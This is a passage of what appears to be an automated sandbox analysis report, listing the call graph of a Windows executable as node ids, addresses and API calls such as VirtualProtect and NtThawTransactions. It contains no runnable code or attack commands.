2043->2044 2045 14000146d 2044->2045 2046 140001394 2 API calls 2045->2046 2047 14000147c 2046->2047 2048 140001394 2 API calls 2047->2048 2049 14000148b 2048->2049 2050 140001394 2 API calls 2049->2050 2051 14000149a 2050->2051 2052 140001394 2 API calls 2051->2052 2053 1400014a9 2052->2053 2054 140001394 2 API calls 2053->2054 2055 1400014b8 2054->2055 2056 140001394 2 API calls 2055->2056 2057 1400014c7 2056->2057 2058 140001394 2 API calls 2057->2058 2059 1400014d6 2058->2059 2060 1400014e5 2059->2060 2061 140001394 2 API calls 2059->2061 2062 140001394 2 API calls 2060->2062 2061->2060 2063 1400014ef 2062->2063 2064 1400014f4 2063->2064 2065 140001394 2 API calls 2063->2065 2066 140001394 2 API calls 2064->2066 2065->2064 2067 1400014fe 2066->2067 2068 140001503 2067->2068 2069 140001394 2 API calls 2067->2069 2070 140001394 2 API calls 2068->2070 2069->2068 2071 14000150d 2070->2071 2072 140001394 2 API calls 2071->2072 2073 140001512 2072->2073 2074 140001394 2 API calls 2073->2074 2075 140001521 2074->2075 2076 140001394 2 API calls 2075->2076 2077 140001530 2076->2077 2078 140001394 2 API calls 2077->2078 2079 14000153f 2078->2079 2080 140001394 2 API calls 2079->2080 2081 14000154e 2080->2081 2082 140001394 2 API calls 2081->2082 2083 14000155d 2082->2083 2084 140001394 2 API calls 2083->2084 2085 14000156c 2084->2085 2086 140001394 2 API calls 2085->2086 2087 14000157b 2086->2087 2088 140001394 2 API calls 2087->2088 2089 14000158a 2088->2089 2090 140001394 2 API calls 2089->2090 2091 140001599 2090->2091 2092 140001394 2 API calls 2091->2092 2093 1400015a8 2092->2093 2094 140001394 2 API calls 2093->2094 2095 1400015b7 2094->2095 2096 140001394 2 API calls 2095->2096 2097 1400015c6 2096->2097 2098 140001394 2 API calls 2097->2098 2099 1400015d5 2098->2099 2100 140001394 2 API calls 2099->2100 2101 1400015e4 2100->2101 2102 140001394 2 API calls 2101->2102 2103 1400015f3 2102->2103 2105 140005a90 malloc 2104->2105 2106 1400013b8 2105->2106 2107 1400013c6 NtThawTransactions 2106->2107 2107->2033 2108 140002104 2109 140002111 EnterCriticalSection 2108->2109 2110 140002218 2108->2110 2111 14000220b LeaveCriticalSection 2109->2111 2115 14000212e 2109->2115 2112 140002272 2110->2112 2114 140002241 DeleteCriticalSection 2110->2114 2111->2110 2113 14000214d TlsGetValue GetLastError 2113->2115 2114->2112 2115->2111 2115->2113 2013 14000216f 2014 140002185 2013->2014 2015 140002178 InitializeCriticalSection 2013->2015 2015->2014 2016 140001a70 2017 14000199e 2016->2017 2021 140001a7d 2016->2021 2018 140001a0f 2017->2018 2019 1400019e9 VirtualProtect 2017->2019 2019->2017 2020 140001b53 2021->2016 2021->2020 2022 140001b36 2021->2022 2023 140001ba0 4 API calls 2022->2023 2023->2020 2833 140002050 2834 14000205e EnterCriticalSection 2833->2834 2835 1400020cf 2833->2835 2836 1400020c2 LeaveCriticalSection 2834->2836 2837 140002079 2834->2837 2836->2835 2837->2836 2838 140001fd0 2839 140001fe4 2838->2839 2840 140002033 2838->2840 2839->2840 2841 140001ffd EnterCriticalSection LeaveCriticalSection 2839->2841 2841->2840 2124 140001ab3 2125 140001a70 2124->2125 2125->2124 2126 140001b36 2125->2126 2127 14000199e 2125->2127 2130 140001b53 2125->2130 2129 140001ba0 4 API calls 2126->2129 2128 140001a0f 2127->2128 2131 1400019e9 VirtualProtect 2127->2131 2129->2130 2131->2127 1985 140001394 1989 140005a90 1985->1989 1987 1400013b8 1988 1400013c6 NtThawTransactions 1987->1988 1990 140005aae 1989->1990 1993 140005adb 1989->1993 1990->1987 1991 140005b83 1992 140005b9f malloc 1991->1992 1994 140005bc0 1992->1994 1993->1990 1993->1991 1994->1990 2116 14000219e 2117 140002272 2116->2117 2118 1400021ab EnterCriticalSection 2116->2118 2119 140002265 LeaveCriticalSection 2118->2119 2121 1400021c8 2118->2121 2119->2117 2120 1400021e9 TlsGetValue GetLastError 2120->2121 2121->2119 2121->2120 2024 140001800 2025 140001812 2024->2025 2026 140001835 fprintf 2025->2026 2027 140001000 2028 14000108b __set_app_type 2027->2028 2029 140001040 2027->2029 2030 1400010b6 2028->2030 2029->2028 2122 140002320 strlen 2123 140002337 2122->2123 2132 140001140 2135 140001160 2132->2135 2134 140001156 2136 1400011b9 2135->2136 2137 14000118b 2135->2137 2138 1400011d3 2136->2138 2139 1400011c7 _amsg_exit 2136->2139 2137->2136 2140 1400011a0 Sleep 2137->2140 2141 140001201 _initterm 2138->2141 2142 14000121a 2138->2142 2139->2138 2140->2136 2140->2137 2141->2142 2158 140001880 2142->2158 2145 14000126a 2146 14000126f malloc 2145->2146 2147 14000128b 2146->2147 2149 1400012d0 2146->2149 2148 1400012a0 strlen malloc memcpy 2147->2148 2148->2148 2148->2149 2169 140003160 2149->2169 2151 140001315 2152 140001344 2151->2152 2153 140001324 2151->2153 2156 140001160 52 API calls 2152->2156 2154 140001338 2153->2154 2155 14000132d _cexit 2153->2155 2154->2134 2155->2154 2157 140001366 2156->2157 2157->2134 2159 140001247 SetUnhandledExceptionFilter 2158->2159 2160 1400018a2 2158->2160 2159->2145 2160->2159 2161 14000194d 2160->2161 2165 140001a20 2160->2165 2162 14000199e 2161->2162 2163 140001ba0 4 API calls 2161->2163 2162->2159 2164 1400019e9 VirtualProtect 2162->2164 2163->2161 2164->2162 2165->2162 2166 140001b53 2165->2166 2167 140001b36 2165->2167 2168 140001ba0 4 API calls 2167->2168 2168->2166 2172 140003176 2169->2172 2170 140003288 wcslen 2245 14000153f 2170->2245 2172->2170 2174 14000347e 2174->2151 2180 140003383 2181 14000342b wcslen 2180->2181 2182 140003441 2181->2182 2184 14000347c 2181->2184 2182->2184 2185 140003466 wcslen 2182->2185 2183 140003541 wcscpy wcscat 2187 140003573 2183->2187 2184->2183 2185->2182 2185->2184 2186 1400035c3 wcscpy wcscat 2189 1400035f9 2186->2189 2187->2186 2188 14000370e wcscpy wcscat 2191 140003747 2188->2191 2189->2188 2190 140003aa2 wcslen 2192 140003ab0 2190->2192 2194 140003aeb 2190->2194 2191->2190 2192->2194 2195 140003ad6 wcslen 2192->2195 2193 140003ba2 wcscpy wcscat 2197 140003bd7 2193->2197 2194->2193 2195->2192 2195->2194 2196 140003c27 wcscpy wcscat 2199 140003c60 2196->2199 2197->2196 2198 140003c9d wcscpy wcscat 2201 140003ce4 2198->2201 2199->2198 2200 140003d36 wcscpy wcscat wcslen 2385 14000146d 2200->2385 2201->2200 2206 140003e4d 2471 1400014a9 2206->2471 2207 140003f7f 2209 14000145e 2 API calls 2207->2209 2216 140003ee4 2209->2216 2211 140003f6e 2213 14000145e 2 API calls 2211->2213 2212 1400056c8 2213->2216 2215 140004011 wcscpy wcscat wcslen 2240 1400040e0 2215->2240 2216->2212 2216->2215 2219 140003ed8 2220 14000145e 2 API calls 2219->2220 2220->2216 2221 1400041d5 wcslen 2222 14000153f 2 API calls 2221->2222 2222->2240 2223 14000537a memcpy 2223->2240 2224 14000543e memcpy 2224->2240 2225 14000468d wcslen 2228 14000153f 2 API calls 2225->2228 2226 140004413 wcslen 2632 14000157b 2226->2632 2228->2240 2229 140005011 wcscpy wcscat wcslen 2230 140001422 2 API calls 2229->2230 2230->2240 2232 14000450b wcslen 2649 1400015a8 2232->2649 2235 140005153 2235->2151 2236 140005483 memcpy 2236->2240 2237 1400026e0 9 API calls 2237->2240 2238 1400051fe wcslen 2239 1400015a8 2 API calls 2238->2239 2239->2240 2240->2221 2240->2223 2240->2224 2240->2225 2240->2226 2240->2229 2240->2232 2240->2235 2240->2236 2240->2237 2240->2238 2241 140005575 memcpy 2240->2241 2242 140004e65 wcscpy wcscat wcslen 2240->2242 2244 14000145e NtThawTransactions malloc 2240->2244 2587 1400014d6 2240->2587 2660 140001521 2240->2660 2758 140001431 2240->2758 2241->2240 2689 140001422 2242->2689 2244->2240 2246 140001394 2 API calls 2245->2246 2247 14000154e 2246->2247 2248 140001394 2 API calls 2247->2248 2249 14000155d 2248->2249 2250 140001394 2 API calls 2249->2250 2251 14000156c 2250->2251 2252 140001394 2 API calls 2251->2252 2253 14000157b 2252->2253 2254 140001394 2 API calls 2253->2254 2255 14000158a 2254->2255 2256 140001394 2 API calls 2255->2256 2257 140001599 2256->2257 2258 140001394 2 API calls 2257->2258 2259 1400015a8 2258->2259 2260 140001394 2 API calls 2259->2260 2261 1400015b7 2260->2261 2262 140001394 2 API calls 2261->2262 2263 1400015c6 2262->2263 2264 140001394 2 API calls 2263->2264 2265 1400015d5 2264->2265 2266 140001394 2 API calls 2265->2266 2267 1400015e4 2266->2267 2268 140001394 2 API calls 2267->2268 2269 1400015f3 2268->2269 2269->2174 2270 140001503 2269->2270 2271 140001394 2 API calls 2270->2271 2272 14000150d 2271->2272 2273 140001394 2 API calls 2272->2273 2274 140001512 2273->2274 2275 140001394 2 API calls 2274->2275 2276 140001521 2275->2276 2277 140001394 2 API calls 2276->2277 2278 140001530 2277->2278 2279 140001394 2 API calls 2278->2279 2280 14000153f 2279->2280 2281 140001394 2 API calls 2280->2281 2282 14000154e 2281->2282 2283 140001394 2 API calls 2282->2283 2284 14000155d 2283->2284 2285 140001394 2 API calls 2284->2285 2286 14000156c 2285->2286 2287 140001394 2 API calls 2286->2287 2288 14000157b 2287->2288 2289 140001394 2 API calls 2288->2289 2290 14000158a 2289->2290 2291 140001394 2 API calls 2290->2291 2292 140001599 2291->2292 2293 140001394 2 API calls 2292->2293 2294 1400015a8 2293->2294 2295 140001394 2 API calls 2294->2295 2296 1400015b7 2295->2296 2297 140001394 2 API calls 2296->2297 2298 1400015c6 2297->2298 2299 140001394 2 API calls 2298->2299 2300 1400015d5 2299->2300 2301 140001394 2 API calls 2300->2301 2302 1400015e4 2301->2302 2303 140001394 2 API calls 2302->2303 2304 1400015f3 2303->2304 2304->2180 2305 14000156c 2304->2305 2306 140001394 2 API calls 2305->2306 2307 14000157b 2306->2307 2308 140001394 2 API calls 2307->2308 2309 14000158a 2308->2309 2310 140001394 2 API calls 2309->2310 2311 140001599 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015a8 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015b7 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015c6 2316->2317 2318 140001394 2 API calls 2317->2318 2319 1400015d5 2318->2319 2320 140001394 2 API calls 2319->2320 2321 1400015e4 2320->2321 2322 140001394 2 API calls 2321->2322 2323 1400015f3 2322->2323 2323->2180 2324 14000145e 2323->2324 2325 140001394 2 API calls 2324->2325 2326 14000146d 2325->2326 2327 140001394 2 API calls 2326->2327 2328 14000147c 2327->2328 2329 140001394 2 API calls 2328->2329 2330 14000148b 2329->2330 2331 140001394 2 API calls 2330->2331 2332 14000149a 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400014a9 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400014b8 2335->2336 2337 140001394 2 API calls 2336->2337 2338 1400014c7 2337->2338 2339 140001394 2 API calls 2338->2339 2340 1400014d6 2339->2340 2341 1400014e5 2340->2341 2342 140001394 2 API calls 2340->2342 2343 140001394 2 API calls 2341->2343 2342->2341 2344 1400014ef 2343->2344 2345 1400014f4 2344->2345 2346 140001394 2 API calls 2344->2346 2347 140001394 2 API calls 2345->2347 2346->2345 2348 1400014fe 2347->2348 2349 140001503 2348->2349 2350 140001394 2 API calls 2348->2350 2351 140001394 2 API calls 2349->2351 2350->2349 2352 14000150d 2351->2352 2353 140001394 2 API calls 2352->2353 2354 140001512 2353->2354 2355 140001394 2 API calls 2354->2355 2356 140001521 2355->2356 2357 140001394 2 API calls 2356->2357 2358 140001530 2357->2358 2359 140001394 2 API calls 2358->2359 2360 14000153f 2359->2360 2361 140001394 2 API calls 2360->2361 2362 14000154e 2361->2362 2363 140001394 2 API calls 2362->2363 2364 14000155d 2363->2364 2365 140001394 2 API calls 2364->2365 2366 14000156c 2365->2366 2367 140001394 2 API calls 2366->2367 2368 14000157b 2367->2368 2369 140001394 2 API calls 2368->2369 2370 14000158a 2369->2370 2371 140001394 2 API calls 2370->2371 2372 140001599 2371->2372 2373 140001394 2 API calls 2372->2373 2374 1400015a8 2373->2374 2375 140001394 2 API calls 2374->2375 2376 1400015b7 2375->2376 2377 140001394 2 API calls 2376->2377 2378 1400015c6 2377->2378 2379 140001394 2 API calls 2378->2379 2380 1400015d5 2379->2380 2381 140001394 2 API calls 2380->2381 2382 1400015e4 2381->2382 2383 140001394 2 API calls 2382->2383 2384 1400015f3 2383->2384 2384->2180 2386 140001394 2 API calls 2385->2386 2387 14000147c 2386->2387 2388 140001394 2 API calls 2387->2388 2389 14000148b 2388->2389 2390 140001394 2 API calls 2389->2390 2391 14000149a 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400014a9 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400014b8 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400014c7 2396->2397 2398 140001394 2 API calls 2397->2398 2399 1400014d6 2398->2399 2400 1400014e5 2399->2400 2401 140001394 2 API calls 2399->2401 2402 140001394 2 API calls 2400->2402 2401->2400 2403 1400014ef 2402->2403 2404 1400014f4 2403->2404 2405 140001394 2 API calls 2403->2405 2406 140001394 2 API calls 2404->2406 2405->2404 2407 1400014fe 2406->2407 2408 140001503 2407->2408 2409 140001394 2 API calls 2407->2409 2410 140001394 2 API calls 2408->2410 2409->2408 2411 14000150d 2410->2411 2412 140001394 2 API calls 2411->2412 2413 140001512 2412->2413 2414 140001394 2 API calls 2413->2414 2415 140001521 2414->2415 2416 140001394 2 API calls 2415->2416 2417 140001530 2416->2417 2418 140001394 2 API calls 2417->2418 2419 14000153f 2418->2419 2420 140001394 2 API calls 2419->2420 2421 14000154e 2420->2421 2422 140001394 2 API calls 2421->2422 2423 14000155d 2422->2423 2424 140001394 2 API calls 2423->2424 2425 14000156c 2424->2425 2426 140001394 2 API calls 2425->2426 2427 14000157b 2426->2427 2428 140001394 2 API calls 2427->2428 2429 14000158a 2428->2429 2430 140001394 2 API calls 2429->2430 2431 140001599 2430->2431 2432 140001394 2 API calls 2431->2432 2433 1400015a8 2432->2433 2434 140001394 2 API calls 2433->2434 2435 1400015b7 2434->2435 2436 140001394 2 API calls 2435->2436 2437 1400015c6 2436->2437 2438 140001394 2 API calls 2437->2438 2439 1400015d5 2438->2439 2440 140001394 2 API calls 2439->2440 2441 1400015e4 2440->2441 2442 140001394 2 API calls 2441->2442 2443 1400015f3 2442->2443 2443->2216 2444 140001530 2443->2444 2445 140001394 2 API calls 2444->2445 2446 14000153f 2445->2446 2447 140001394 2 API calls 2446->2447 2448 14000154e 2447->2448 2449 140001394 2 API calls 2448->2449 2450 14000155d 2449->2450 2451 140001394 2 API calls 2450->2451 2452 14000156c 2451->2452 2453 140001394 2 API calls 2452->2453 2454 14000157b 2453->2454 2455 140001394 2 API calls 2454->2455 2456 14000158a 2455->2456 2457 140001394 2 API calls 2456->2457 2458 140001599 2457->2458 2459 140001394 2 API calls 2458->2459 2460 1400015a8 2459->2460 2461 140001394 2 API calls 2460->2461 2462 1400015b7 2461->2462 2463 140001394 2 API calls 2462->2463 2464 1400015c6 2463->2464 2465 140001394 2 API calls 2464->2465 2466 1400015d5 2465->2466 2467 140001394 2 API calls 2466->2467 2468 1400015e4 2467->2468 2469 140001394 2 API calls 2468->2469 2470 1400015f3 2469->2470 2470->2206 2470->2207 2472 140001394 2 API calls 2471->2472 2473 1400014b8 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400014c7 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400014d6 2476->2477 2478 1400014e5 2477->2478 2479 140001394 2 API calls 2477->2479 2480 140001394 2 API calls 2478->2480 2479->2478 2481 1400014ef 2480->2481 2482 1400014f4 2481->2482 2483 140001394 2 API calls 2481->2483 2484 140001394 2 API calls 2482->2484 2483->2482 2485 1400014fe 2484->2485 2486 140001503 2485->2486 2487 140001394 2 API calls 2485->2487 2488 140001394 2 API calls 2486->2488 2487->2486 2489 14000150d 2488->2489 2490 140001394 2 API calls 2489->2490 2491 140001512 2490->2491 2492 140001394 2 API calls 2491->2492 2493 140001521 2492->2493 2494 140001394 2 API calls 2493->2494 2495 140001530 2494->2495 2496 140001394 2 API calls 2495->2496 2497 14000153f 2496->2497 2498 140001394 2 API calls 2497->2498 2499 14000154e 2498->2499 2500 140001394 2 API calls 2499->2500 2501 14000155d 2500->2501 2502 140001394 2 API calls 2501->2502 2503 14000156c 2502->2503 2504 140001394 2 API calls 2503->2504 2505 14000157b 2504->2505 2506 140001394 2 API calls 2505->2506 2507 14000158a 2506->2507 2508 140001394 2 API calls 2507->2508 2509 140001599 2508->2509 2510 140001394 2 API calls 2509->2510 2511 1400015a8 2510->2511 2512 140001394 2 API calls 2511->2512 2513 1400015b7 2512->2513 2514 140001394 2 API calls 2513->2514 2515 1400015c6 2514->2515 2516 140001394 2 API calls 2515->2516 2517 1400015d5 2516->2517 2518 140001394 2 API calls 2517->2518 2519 1400015e4 2518->2519 2520 140001394 2 API calls 2519->2520 2521 1400015f3 2520->2521 2521->2211 2522 140001440 2521->2522 2523 140001394 2 API calls 2522->2523 2524 14000144f 2523->2524 2525 140001394 2 API calls 2524->2525 2526 14000145e 2525->2526 2527 140001394 2 API calls 2526->2527 2528 14000146d 2527->2528 2529 140001394 2 API calls 2528->2529 2530 14000147c 2529->2530 2531 140001394 2 API calls 2530->2531 2532 14000148b 2531->2532 2533 140001394 2 API calls 2532->2533 2534 14000149a 2533->2534 2535 140001394 2 API calls 2534->2535 2536 1400014a9 2535->2536 2537 140001394 2 API calls 2536->2537 2538 1400014b8 2537->2538 2539 140001394 2 API calls 2538->2539 2540 1400014c7 2539->2540 2541 140001394 2 API calls 2540->2541 2542 1400014d6 2541->2542 2543 1400014e5 2542->2543 2544 140001394 2 API calls 2542->2544 2545 140001394 2 API calls 2543->2545 2544->2543 2546 1400014ef 2545->2546 2547 1400014f4 2546->2547 2548 140001394 2 API calls 2546->2548 2549 140001394 2 API calls 2547->2549 2548->2547 2550 1400014fe 2549->2550 2551 140001503 2550->2551 2552 140001394 2 API calls 2550->2552 2553 140001394 2 API calls 2551->2553 2552->2551 2554 14000150d 2553->2554 2555 140001394 2 API calls 2554->2555 2556 140001512 2555->2556 2557 140001394 2 API calls 2556->2557 2558 140001521 2557->2558 2559 140001394 2 API calls 2558->2559 2560 140001530 2559->2560 2561 140001394 2 API calls 2560->2561 2562 14000153f 2561->2562 2563 140001394 2 API calls 2562->2563 2564 14000154e 2563->2564 2565 140001394 2 API calls 2564->2565 2566 14000155d 2565->2566 2567 140001394 2 API calls 2566->2567 2568 14000156c 2567->2568 2569 140001394 2 API calls 2568->2569 2570 14000157b 2569->2570 2571 140001394 2 API calls 2570->2571 2572 14000158a 2571->2572 2573 140001394 2 API calls 2572->2573 2574 140001599 2573->2574 2575 140001394 2 API calls 2574->2575 2576 1400015a8 2575->2576 2577 140001394 2 API calls 2576->2577 2578 1400015b7 2577->2578 2579 140001394 2 API calls 2578->2579 2580 1400015c6 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400015d5 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400015e4 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400015f3 2585->2586 2586->2211 2586->2219 2588 1400014e5 2587->2588 2589 140001394 2 API calls 2587->2589 2590 140001394 2 API calls 2588->2590 2589->2588 2591 1400014ef 2590->2591 2592 1400014f4 2591->2592 2593 140001394 2 API calls 2591->2593 2594 140001394 2 API calls 2592->2594 2593->2592 2595 1400014fe 2594->2595 2596 140001503 2595->2596 2597 140001394 2 API calls 2595->2597 2598 140001394 2 API calls 2596->2598 2597->2596 2599 14000150d 2598->2599 2600 140001394 2 API calls 2599->2600 2601 140001512 2600->2601 2602 140001394 2 API calls 2601->2602 2603 140001521 2602->2603 2604 140001394 2 API calls 2603->2604 2605 140001530 2604->2605 2606 140001394 2 API calls 2605->2606 2607 14000153f 2606->2607 2608 140001394 2 API calls 2607->2608 2609 14000154e 2608->2609 2610 140001394 2 API calls 2609->2610 2611 14000155d 2610->2611 2612 140001394 2 API calls 2611->2612 2613 14000156c 2612->2613 2614 140001394 2 API calls 2613->2614 2615 14000157b 2614->2615 2616 140001394 2 API calls 2615->2616 2617 14000158a 2616->2617 2618 140001394 2 API calls 2617->2618 2619 140001599 2618->2619 2620 140001394 2 API calls 2619->2620 2621 1400015a8 2620->2621 2622 140001394 2 API calls 2621->2622 2623 1400015b7 2622->2623 2624 140001394 2 API calls 2623->2624 2625 1400015c6 2624->2625 2626 140001394 2 API calls 2625->2626 2627 1400015d5 2626->2627 2628 140001394 2 API calls 2627->2628 2629 1400015e4 2628->2629 2630 140001394 2 API calls 2629->2630 2631 1400015f3 2630->2631 2631->2240 2633 140001394 2 API calls 2632->2633 2634 14000158a 2633->2634 2635 140001394 2 API calls 2634->2635 2636 140001599 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015a8 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015b7 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015c6 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015d5 2643->2644 2645 140001394 2 API calls 2644->2645 2646 1400015e4 2645->2646 2647 140001394 2 API calls 2646->2647 2648 1400015f3 2647->2648 2648->2240 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2240 2661 140001394 2 API calls 2660->2661 2662 140001530 2661->2662 2663 140001394 2 API calls 2662->2663 2664 14000153f 2663->2664 2665 140001394 2 API calls 2664->2665 2666 14000154e 2665->2666 2667 140001394 2 API calls 2666->2667 2668 14000155d 2667->2668 2669 140001394 2 API calls 2668->2669 2670 14000156c 2669->2670 2671 140001394 2 API calls 2670->2671 2672 14000157b 2671->2672 2673 140001394 2 API calls 2672->2673 2674 14000158a 2673->2674 2675 140001394 2 API calls 2674->2675 2676 140001599 2675->2676 2677 140001394 2 API calls 2676->2677 2678 1400015a8 2677->2678 2679 140001394 2 API calls 2678->2679 2680 1400015b7 2679->2680 2681 140001394 2 API calls 2680->2681 2682 1400015c6 2681->2682 2683 140001394 2 API calls 2682->2683 2684 1400015d5 2683->2684 2685 140001394 2 API calls 2684->2685 2686 1400015e4 2685->2686 2687 140001394 2 API calls 2686->2687 2688 1400015f3 2687->2688 2688->2240 2690 140001394 2 API calls 2689->2690 2691 140001431 2690->2691 2692 140001394 2 API calls 2691->2692 2693 140001440 2692->2693 2694 140001394 2 API calls 2693->2694 2695 14000144f 2694->2695 2696 140001394 2 API calls 2695->2696 2697 14000145e 2696->2697 2698 140001394 2 API calls 2697->2698 2699 14000146d 2698->2699 2700 140001394 2 API calls 2699->2700 2701 14000147c 2700->2701 2702 140001394 2 API calls 2701->2702 2703 14000148b 2702->2703 2704 140001394 2 API calls 2703->2704 2705 14000149a 2704->2705 2706 140001394 2 API calls 2705->2706 2707 1400014a9 2706->2707 2708 140001394 2 API calls 2707->2708 2709 1400014b8 2708->2709 2710 140001394 2 API calls 2709->2710 2711 1400014c7 2710->2711 2712 140001394 2 API calls 2711->2712 2713 1400014d6 2712->2713 2714 1400014e5 2713->2714 2715 140001394 2 API calls 2713->2715 2716 140001394 2 API calls 2714->2716 2715->2714 2717 1400014ef 2716->2717 2718 1400014f4 2717->2718 2719 140001394 2 API calls 2717->2719 2720 140001394 2 API calls 2718->2720 2719->2718 2721 1400014fe 2720->2721 2722 140001503 2721->2722 2723 140001394 2 API calls 2721->2723 2724 140001394 2 API calls 2722->2724 2723->2722 2725 14000150d 2724->2725 2726 140001394 2 API calls 2725->2726 2727 140001512 2726->2727 2728 140001394 2 API calls 2727->2728 2729 140001521 2728->2729 2730 140001394 2 API calls 2729->2730 2731 140001530 2730->2731 2732 140001394 2 API calls 2731->2732 2733 14000153f 2732->2733 2734 140001394 2 API calls 2733->2734 2735 14000154e 2734->2735 2736 140001394 2 API calls 2735->2736 2737 14000155d 2736->2737 2738 140001394 2 API calls 2737->2738 2739 14000156c 2738->2739 2740 140001394 2 API calls 2739->2740 2741 14000157b 2740->2741 2742 140001394 2 API calls 2741->2742 2743 14000158a 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001599 2744->2745 2746 140001394 2 API calls 2745->2746 2747 1400015a8 2746->2747 2748 140001394 2 API calls 2747->2748 2749 1400015b7 2748->2749 2750 140001394 2 API calls 2749->2750 2751 1400015c6 2750->2751 2752 140001394 2 API calls 2751->2752 2753 1400015d5 2752->2753 2754 140001394 2 API calls 2753->2754 2755 1400015e4 2754->2755 2756 140001394 2 API calls 2755->2756 2757 1400015f3 2756->2757 2757->2240 2759 140001394 2 API calls 2758->2759 2760 140001440 2759->2760 2761 140001394 2 API calls 2760->2761 2762 14000144f 2761->2762 2763 140001394 2 API calls 2762->2763 2764 14000145e 2763->2764 2765 140001394 2 API calls 2764->2765 2766 14000146d 2765->2766 2767 140001394 2 API calls 2766->2767 2768 14000147c 2767->2768 2769 140001394 2 API calls 2768->2769 2770 14000148b 2769->2770 2771 140001394 2 API calls 2770->2771 2772 14000149a 2771->2772 2773 140001394 2 API calls 2772->2773 2774 1400014a9 2773->2774 2775 140001394 2 API calls 2774->2775 2776 1400014b8 2775->2776 2777 140001394 2 API calls 2776->2777 2778 1400014c7 2777->2778 2779 140001394 2 API calls 2778->2779 2780 1400014d6 2779->2780 2781 1400014e5 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014ef 2783->2784 2785 1400014f4 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 1400014fe 2787->2788 2789 140001503 2788->2789 2790 140001394 2 API calls 2788->2790 2791 140001394 2 API calls 2789->2791 2790->2789 2792 14000150d 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001512 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001521 2795->2796 2797 140001394 2 API calls 2796->2797 2798 140001530 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000153f 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000154e 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000155d 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000156c 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000157b 2807->2808 2809 140001394 2 API calls 2808->2809 2810 14000158a 2809->2810 2811 140001394 2 API calls 2810->2811 2812 140001599 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015a8 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015b7 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015c6 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015d5 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015e4 2821->2822 2823 140001394 2 API calls 2822->2823 2824 1400015f3 2823->2824 2824->2240

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_0000000140001AE4 32 Function_0000000140001D40 0->32 75 Function_0000000140001BA0 0->75 1 Function_00000001400014E5 71 Function_0000000140001394 1->71 2 Function_00000001400010F0 3 Function_00000001400059F1 4 Function_00000001400057F1 5 Function_00000001400014F4 5->71 6 Function_0000000140001800 66 Function_0000000140002290 6->66 7 Function_0000000140001E00 8 Function_0000000140002F00 54 Function_0000000140001370 8->54 9 Function_0000000140001000 9->7 38 Function_0000000140001750 9->38 81 Function_0000000140001FB0 9->81 87 Function_0000000140001FC0 9->87 10 Function_0000000140002500 11 Function_0000000140003101 12 Function_0000000140005901 13 Function_0000000140001503 13->71 14 Function_0000000140001404 14->71 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140005711 18 Function_0000000140005811 19 Function_0000000140001512 19->71 20 Function_0000000140002420 21 Function_0000000140002320 22 Function_0000000140003120 23 Function_0000000140001521 23->71 24 Function_0000000140001422 24->71 25 Function_0000000140001530 25->71 26 Function_0000000140001431 26->71 27 Function_000000014000153F 27->71 28 Function_0000000140005D40 62 Function_0000000140005A80 28->62 29 Function_0000000140001440 29->71 30 Function_0000000140001140 45 Function_0000000140001160 30->45 31 Function_0000000140003140 32->66 33 Function_0000000140005841 34 Function_0000000140005741 35 Function_0000000140001F47 55 Function_0000000140001870 35->55 36 Function_0000000140002050 37 Function_0000000140001650 39 Function_0000000140003051 40 Function_000000014000155D 40->71 41 Function_000000014000145E 41->71 42 Function_0000000140002460 43 Function_0000000140002660 44 Function_0000000140003160 44->8 44->13 44->23 44->24 44->25 44->26 44->27 44->29 44->41 44->43 51 Function_000000014000156C 44->51 52 Function_000000014000146D 44->52 44->54 60 Function_000000014000157B 44->60 44->62 78 Function_00000001400015A8 44->78 79 Function_00000001400014A9 44->79 86 Function_00000001400016C0 44->86 97 Function_00000001400014D6 44->97 99 Function_00000001400026E0 44->99 45->44 45->45 45->55 61 Function_0000000140001880 45->61 65 Function_0000000140001F90 45->65 45->86 46 Function_0000000140001760 100 Function_00000001400020E0 46->100 47 Function_0000000140005A60 48 Function_0000000140005761 49 Function_0000000140005861 50 Function_0000000140001E65 50->55 51->71 52->71 53 Function_000000014000216F 56 Function_0000000140001A70 56->32 56->75 57 Function_0000000140003070 58 Function_0000000140005870 59 Function_0000000140005971 60->71 61->20 61->32 61->43 61->75 63 Function_0000000140005781 64 Function_0000000140005A90 64->62 67 Function_0000000140002590 68 Function_0000000140003090 69 